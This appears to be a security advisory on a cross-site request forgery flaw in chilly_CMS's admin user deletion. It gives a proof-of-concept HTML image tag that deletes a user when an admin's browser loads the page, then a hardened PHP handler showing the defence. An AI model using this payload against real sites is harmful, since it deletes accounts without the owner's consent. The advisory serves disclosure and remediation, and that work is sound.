=======================================================================
chilly_CMS CSRF Vulnerability
=======================================================================
# Vulnerability found in: Admin module
# Email: Pratulag@yahoo.com
# Company: aksitservices
# Credit: Pratul Agrawal
# Software: chilly_CMS
# Category: CMS / Portals
# Site page: http://www.opensourcecms.com/demo/2/292/chillyCMS/admin/usergroups.site.php
# Platform: PHP
# Greetz to Gaurav, Prateek, Vivek, Sanjay, Sourabh, Varun (My Web Team)
# Proof of concept #
Targeted URL: http://www.opensourcecms.com/demo/2/292/chillyCMS
Script to delete the admin user through Cross-Site Request Forgery:
................................................................................................
<html>
<body>
<img src="http://demo.opensourcecms.com/chillycms/admin/usersgroups.site.php?action=deleteuser&id=[user ID]" />
</body>
</html>
................................................................................................
After the page containing this image tag has been loaded in an authenticated admin's browser, refresh the admin user list and you can see that the targeted entry has been deleted automatically.
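The root cause shown above is that a single GET request with `action=deleteuser&id=...` performs a state change, and the browser attaches the admin's session cookie to that request no matter which site issued it. The following PHP handler is an added example written for this advisory; it is not chilly_CMS code, and the function names `delete_user()` and the file name are assumptions. It closes the hole with three independent checks: the action only accepts POST (an `<img>` or link can only send GET), a per-session synchronizer token is required and compared in constant time, and the `id` parameter is validated before use. The session cookie is also marked `SameSite=Lax` as defence in depth, and a failed token check is logged so the attempt is visible to monitoring.

```php
<?php
// Hardened "delete user" action (added example, not chilly_CMS code).
// Assumptions (hypothetical): the application uses PHP sessions and exposes
// a delete_user(int $id) function that performs the actual deletion.

// Defence in depth: a SameSite cookie is not sent on cross-site requests
// initiated by an attacker's page (requires PHP 7.3+).
session_set_cookie_params([
    'httponly' => true,
    'secure'   => true,
    'samesite' => 'Lax',
]);
session_start();

// Issue one CSRF token per session; called when rendering the admin form.
function csrf_token(): string {
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Validate the token submitted with a request using a constant-time compare.
function csrf_valid($submitted): bool {
    return isset($_SESSION['csrf_token'])
        && is_string($submitted)
        && hash_equals($_SESSION['csrf_token'], $submitted);
}

// Hypothetical application function standing in for the CMS's own deletion logic.
function delete_user(int $id): void {
    // ... delete the user row with the given id ...
}

$action = $_POST['action'] ?? $_GET['action'] ?? '';
if ($action === 'deleteuser') {
    // 1. State changes only over POST. The advisory's <img src="...?action=deleteuser&id=N">
    //    payload can only send GET, so it stops here.
    if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
        http_response_code(405);
        header('Allow: POST');
        exit('Method not allowed');
    }
    // 2. Synchronizer token: an attacker's page cannot read the victim's token,
    //    so it cannot forge a request that carries it. Log failures for detection.
    if (!csrf_valid($_POST['csrf_token'] ?? null)) {
        http_response_code(403);
        error_log(sprintf('CSRF check failed for deleteuser from %s',
            $_SERVER['REMOTE_ADDR'] ?? 'unknown'));
        exit('Invalid request token');
    }
    // 3. Validate the parameter before acting on it.
    $id = filter_input(INPUT_POST, 'id', FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1]]);
    if ($id === false || $id === null) {
        http_response_code(400);
        exit('Bad user id');
    }
    delete_user($id);
    exit('User deleted');
}
?>
<!-- The legitimate admin form carries the token as a hidden field. -->
<form method="post" action="usersgroups.site.php">
  <input type="hidden" name="action" value="deleteuser">
  <input type="hidden" name="csrf_token"
         value="<?= htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') ?>">
  <input type="number" name="id" min="1" required>
  <button type="submit">Delete user</button>
</form>
```

The POST-only check alone is not a complete fix, because an attacker's page can auto-submit a hidden form with POST; the token is what actually binds the request to the admin's session. The `SameSite` attribute helps on current browsers but should be treated as an extra layer rather than the primary control.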
# If you have any questions, comments, or concerns, feel free to contact me.